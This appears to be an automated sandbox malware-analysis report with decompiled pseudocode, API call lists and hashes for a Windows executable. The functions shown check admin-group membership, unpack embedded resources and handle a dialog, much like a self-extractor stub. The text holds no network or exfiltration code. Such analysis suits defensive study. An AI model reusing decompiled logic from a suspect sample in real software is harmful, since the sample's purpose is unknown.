                                                                                                                                                                                                                                              0x00a818b5
                                                                                                                                                                                                                                              0x00a818be
                                                                                                                                                                                                                                              0x00a818c0
                                                                                                                                                                                                                                              0x00a818c6
                                                                                                                                                                                                                                              0x00a818c7
                                                                                                                                                                                                                                              0x00a818ca
                                                                                                                                                                                                                                              0x00a818cf
                                                                                                                                                                                                                                              0x00a819c9
                                                                                                                                                                                                                                              0x00a819d8
                                                                                                                                                                                                                                              0x00a819d8
                                                                                                                                                                                                                                              0x00a818df
                                                                                                                                                                                                                                              0x00a819b8
                                                                                                                                                                                                                                              0x00a819bd
                                                                                                                                                                                                                                              0x00a819bf
                                                                                                                                                                                                                                              0x00a819bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a819bd
                                                                                                                                                                                                                                              0x00a818fa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81912
                                                                                                                                                                                                                                              0x00a819aa
                                                                                                                                                                                                                                              0x00a819ad
                                                                                                                                                                                                                                              0x00a819b3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81927
                                                                                                                                                                                                                                              0x00a81927
                                                                                                                                                                                                                                              0x00a81932
                                                                                                                                                                                                                                              0x00a81936
                                                                                                                                                                                                                                              0x00a819a9
                                                                                                                                                                                                                                              0x00a819a9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a819a9
                                                                                                                                                                                                                                              0x00a8194c
                                                                                                                                                                                                                                              0x00a819a2
                                                                                                                                                                                                                                              0x00a819a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8196e
                                                                                                                                                                                                                                              0x00a81970
                                                                                                                                                                                                                                              0x00a81999
                                                                                                                                                                                                                                              0x00a8199c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8199c
                                                                                                                                                                                                                                              0x00a81972
                                                                                                                                                                                                                                              0x00a81972
                                                                                                                                                                                                                                              0x00a81975
                                                                                                                                                                                                                                              0x00a81984
                                                                                                                                                                                                                                              0x00a81985
                                                                                                                                                                                                                                              0x00a8198a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8198c
                                                                                                                                                                                                                                              0x00a81991
                                                                                                                                                                                                                                              0x00a81996
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81996
                                                                                                                                                                                                                                              0x00a8194c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A818DD), ref: 00A8181A
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A8182C
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: AllocateAndInitializeSid.ADVAPI32(00A818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A818DD), ref: 00A81855
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: FreeSid.ADVAPI32(?,?,?,?,00A818DD), ref: 00A81883
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A818DD), ref: 00A8188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A818EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A818F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A8190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A81918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A8192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A81944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A81964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 00A8197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00A8199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A819A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A819AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 59bffca94b0099b5f7fed9b045a0bfe122e643e7d164389d151c96bc18aa522f
                                                                                                                                                                                                                                              • Instruction ID: e3b7cedbe4a11f86c7e978b95e0a3ab3e3bd9c476843d315844ed007d67bb661
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59bffca94b0099b5f7fed9b045a0bfe122e643e7d164389d151c96bc18aa522f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8631F971A00209EBEB20EFE5DC98AAFBBBCFB14750F50442AE545D6150DB359906CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00a84699
                                                                                                                                                                                                                                              0x00a8469b
                                                                                                                                                                                                                                              0x00a846a9
                                                                                                                                                                                                                                              0x00a846af
                                                                                                                                                                                                                                              0x00a846b4
                                                                                                                                                                                                                                              0x00a846bc
                                                                                                                                                                                                                                              0x00a846f9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a846f9
                                                                                                                                                                                                                                              0x00a846d9
                                                                                                                                                                                                                                              0x00a846dd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a846e5
                                                                                                                                                                                                                                              0x00a846ef
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a846f5
                                                                                                                                                                                                                                              0x00a846ff

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: dd0bf9c5403da650351e66c81cfcb1d571e176f881d1105bd4d1a866b2db3d1f
                                                                                                                                                                                                                                              • Instruction ID: cf4e3c0cc87ff64fb148694de8c2699f18556a2e794df76bbb0d2e56b9e31ba7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd0bf9c5403da650351e66c81cfcb1d571e176f881d1105bd4d1a866b2db3d1f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601A9362442117BF32077E56C4DF6B7E3CDBDAF51F080425FA4997190D971885287B6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E00A817EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0xa8a288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00a817f6
                                                                                                                                                                                                                                              0x00a817fd
                                                                                                                                                                                                                                              0x00a81805
                                                                                                                                                                                                                                              0x00a8180b
                                                                                                                                                                                                                                              0x00a8180d
                                                                                                                                                                                                                                              0x00a81815
                                                                                                                                                                                                                                              0x00a81818
                                                                                                                                                                                                                                              0x00a81820
                                                                                                                                                                                                                                              0x00a81824
                                                                                                                                                                                                                                              0x00a8182c
                                                                                                                                                                                                                                              0x00a81832
                                                                                                                                                                                                                                              0x00a81837
                                                                                                                                                                                                                                              0x00a81851
                                                                                                                                                                                                                                              0x00a81854
                                                                                                                                                                                                                                              0x00a8185d
                                                                                                                                                                                                                                              0x00a81862
                                                                                                                                                                                                                                              0x00a8186c
                                                                                                                                                                                                                                              0x00a81872
                                                                                                                                                                                                                                              0x00a81877
                                                                                                                                                                                                                                              0x00a8187e
                                                                                                                                                                                                                                              0x00a8187e
                                                                                                                                                                                                                                              0x00a81883
                                                                                                                                                                                                                                              0x00a81883
                                                                                                                                                                                                                                              0x00a8185d
                                                                                                                                                                                                                                              0x00a8188a
                                                                                                                                                                                                                                              0x00a8188a
                                                                                                                                                                                                                                              0x00a818a2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A818DD), ref: 00A8181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A8182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00A818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A818DD), ref: 00A81855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,00A818DD), ref: 00A81883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A818DD), ref: 00A8188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 3ceed05b81fb8c9583402d8f3a84b58604509b1c43e71f33bd5685275180734b
                                                                                                                                                                                                                                              • Instruction ID: 0d93d2c83bf3db8e1ec16b4b1e4f145140817f8850bbd2142fc95f34d90e7752
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ceed05b81fb8c9583402d8f3a84b58604509b1c43e71f33bd5685275180734b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9116671E00209AFEB10EFE4DC4AABEBB78FF44701F10056AFA05E6290DA719D068791
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E00A843D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0xa89404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa891dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00a83459
                                                                                                                                                                                                                                              0x00a8345c
                                                                                                                                                                                                                                              0x00a834d8
                                                                                                                                                                                                                                              0x00a834de
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a834e0
                                                                                                                                                                                                                                              0x00a8345e
                                                                                                                                                                                                                                              0x00a83463
                                                                                                                                                                                                                                              0x00a8349a
                                                                                                                                                                                                                                              0x00a834a0
                                                                                                                                                                                                                                              0x00a834a7
                                                                                                                                                                                                                                              0x00a834b2
                                                                                                                                                                                                                                              0x00a834c4
                                                                                                                                                                                                                                              0x00a834cb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a834cb
                                                                                                                                                                                                                                              0x00a83468
                                                                                                                                                                                                                                              0x00a8346e
                                                                                                                                                                                                                                              0x00a83474
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8347c
                                                                                                                                                                                                                                              0x00a8348c
                                                                                                                                                                                                                                              0x00a83490
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83496
                                                                                                                                                                                                                                              0x00a83484
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83486
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83486
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A83490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A8349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A834B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 00A834C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00A834CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00A834D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: d33fb6efd9b121e0b6c31fd3ce2abe8a63f59e16dfcda8c68f28237aaaee7ddb
                                                                                                                                                                                                                                              • Instruction ID: aaaff34b1ab22a105d6ee60d7d921d989c2a95c553eb302ed7c8fe164eac000e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33fb6efd9b121e0b6c31fd3ce2abe8a63f59e16dfcda8c68f28237aaaee7ddb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE01B132240114ABEF56BFA5DC0C96E3E64EB09F12F004511F947865A0CB709F52CB85
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0xa89a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A81680(_t65, E00A817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E00A865E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E00A81680(_t65, E00A817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00a82aac
                                                                                                                                                                                                                                              0x00a82ab7
                                                                                                                                                                                                                                              0x00a82abc
                                                                                                                                                                                                                                              0x00a82abe
                                                                                                                                                                                                                                              0x00a82ac3
                                                                                                                                                                                                                                              0x00a82ac6
                                                                                                                                                                                                                                              0x00a82ac9
                                                                                                                                                                                                                                              0x00a82ace
                                                                                                                                                                                                                                              0x00a82ae6
                                                                                                                                                                                                                                              0x00a82bdc
                                                                                                                                                                                                                                              0x00a82bdc
                                                                                                                                                                                                                                              0x00a82be0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82af2
                                                                                                                                                                                                                                              0x00a82afc
